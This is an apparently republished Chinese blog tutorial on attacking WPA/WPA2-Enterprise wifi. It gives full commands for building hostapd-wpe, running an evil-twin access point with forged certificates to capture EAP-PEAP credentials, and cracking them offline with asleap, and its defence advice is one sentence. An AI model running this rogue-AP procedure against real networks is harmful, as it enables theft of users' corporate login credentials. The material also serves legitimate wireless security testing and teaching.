无线渗透(下)—企业级WPA破解

0x00. 企业级WPA/WPA2简介

WPA/WPA2企业版:在大型企业网络中,通常采用802.1X的接入认证方式。802.1X认证是一种基于接口的网络接入控制,用户提供认证所需的凭证,如用户名和密码,通过特定的用户认证服务器(一般是RADIUS服务器)和可扩展认证协议EAP(Extensible Authentication Protocol)实现对用户的认证。WPA/WPA2支持基于EAP-TLS(Transport Layer Security)和EAP-PEAP(Protected EAP)的802.1X认证方式。

0x01. WPA/WPA2企业版认证原理

上图详细介绍了基于EAP-PEAP的802.1x认证方式。

1.首先STA向周围发送PROBE REQUEST帧,等待应答

2.AP收到之后回应一个PROBE RESPONSE帧给STA(AC连接多个AP)

3.认证开始,AP本身不会进行认证过程,而是将STA发送过来的认证信息转发给后端的RADIUS服务器,由RADIUS服务器控制整个认证过程

4.认证成功,连接上AP(具体交换的数据信息我在WPA加密那篇说过了,这里不再累赘)

0x02. WPA/WPA2企业版攻击原理

在企业级的WPA认证过程中会需要账号密码来登陆AP,我们所需要做的就是伪造一个相同ESSID的AP,同样在后端也伪造RADIUS服务器,如果STA来连接伪造的AP,那么它就会将加密后的密钥传输给我们的RADIUS服务器,离线破解密钥就能得到密码,账号是明文传输的。

攻击原理

1.伪造一个企业级的AP

2.诱使目标连接AP,获取加密后的密钥

3.离线破解,获取明文密钥

0x03. 攻击实战

下面给大家介绍一下攻击的操作步骤:

环境准备

1.kali Linux虚拟机

2.TL-WN722N网卡

环境布置与实战

1.为了伪造企业级的AP,我们需要先给kali中的hostapd打上hostapd-wpe补丁

git clone https://github.com/OpenSecurityResearch/hostapd-wpe

2.下载最新版的hostpad,安装依赖包

wget http://w1.fi/releases/hostapd-2.6.tar.gz && apt-get install libssl-dev libnl-genl-3-dev libssl1.0-dev

3.解开tar包,给hostpad-2.6打补丁

tar zxvf hostapd-2.6.tar.gz && cd hostapd-2.6 && patch -p1 < ../hostapd-wpe/hostapd-wpe.patch

4.编译hostpad

cd hostpad/ && make

5.生成伪造证书

cd ../../hostapd-wpe/certs/ && ./bootstrap

6.配置hostapd-wpe.conf文件,ssid改为想要伪造的AP名字(我用的是wifi-free)

cd ../../hostapd-2.6/hostapd/ && vim hostapd-wpe.conf

7.启动无线网卡,不用开启monitor模式

service network-manager stop && airmon-ng check kill && ifconfig wlan0 up

8.伪造AP,诱使目标连接

./hostapd-wpe hostapd-wpe.conf

9.可以看到目标正在连接我们伪造的AP,用的username是admin,password经过了加密的,但是我们依然可以利用asleap来解密, -C指定challenge,-R指定response,-W指定字典文件.下面是破解出来的密码password

asleap -C 8d:a9:83:98:98:f4:34:a6 -R e5:24:78:69:2e:29:9f:ee:42:d8c:d7:4e:d3:f5:65:22:da:7d:57:24:14:da:14 -W ../../sqlmap.txt

0x04. 防御

和WPA个人级的防御策略一样,不要随意在任何地方连接Wi-Fi,尽量将密码设置复杂一点,再安全的加密措施也会被弱密码毁于一旦。

0x05. 结语

关于密码破解的文章就写到这里了,下篇文章笔者会教大家如果伪造AP,其实本篇文章已经通过hostapd伪造过一个AP了,笔者不过是想多介绍几种方法,大家挑喜欢的去用吧!另外最近笔者创建了自己的博客,欢迎大家点击阅读原文访问。

原文发布于微信公众号 - 信安之路(xazlsec)

原文发表时间:2017-09-03

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏葡萄城控件技术团队

网站HTTP升级HTTPS完全配置手册

今天,所有使用Google Chrome稳定版的用户迎来了v68正式版首个版本的发布,详细版本号为v68.0.3440.75,上一个正式版v67.0.3396....

44900
来自专栏黑白安全

用aircrack-ng破解 wifi 密码

开始前,先连上无线网卡,因为虚拟机中的kali系统不用调用笔记本自带的无线网卡,所以需要一个外接无线网卡,然后接入kali系统。

37340
来自专栏Java技术栈

JSON Web Token (JWT),服务端信息传输安全解决方案。

JWT介绍 JSON Web Token(JWT)是一种开放标准(RFC 7519),它定义了一种紧凑独立的基于JSON对象在各方之间安全地传输信息的方式。这些...

472100
来自专栏腾讯云API

腾讯云 API 最佳实践:保护你的密钥

使用腾讯云 API 时,你需要用密钥来签名你的 API 请求。腾讯云接收到你的请求后,会比对你的签名串和实际请求参数。

8.7K110
来自专栏云计算教程系列

如何在Ubuntu 16.04中为Apache创建自签名SSL证书

TLS或传输层安全性及其前身SSL(代表安全套接字层)是用于将正常流量包装在受保护的加密包装中的Web协议。

35900
来自专栏JetpropelledSnake

SNMP学习笔记之SNMPv3的配置和认证以及TroubleShooting

snmp v3安全级别有三种,分别为noAuthNoPriv(不认证也不加密)、authNoPriv(认证但是不加密)、authPriv(既认证又加密)

24710
来自专栏静下来

wordpress您的主机禁用了mail()函数 SMTP邮件通知解决方法

image.png 由于国家规定今后论坛啥的发帖得实名,所以我服务器测评的网站就关闭了评论,仅注册了用户才能评论。 然后看了下wordpress默认的邮件是没用...

89170
来自专栏云计算教程系列

如何在Debian 9中为Apache创建自签名SSL证书

TLS或传输层安全性及其前身SSL(代表安全套接字层)是用于将正常流量包装在受保护的加密包装中的Web协议。

19920
来自专栏北京马哥教育

吐血整理所有常用端口,不全你来打我!

作者:ADreamClusive 来源: http://blog.csdn.net/u013943420/article/details/65938696 大家...

432130
来自专栏尾尾部落

让网站成为 HTTPS 安全站点

之前用过阿里云的 SSL 免费证书,但是期限只有一年,昨天过期了,看了其他收费的 SSL 证书,还是很贵的,在读小硕实在买不起,只能找找免费的 SSL 证书了。

26810

扫码关注云+社区

领取腾讯云代金券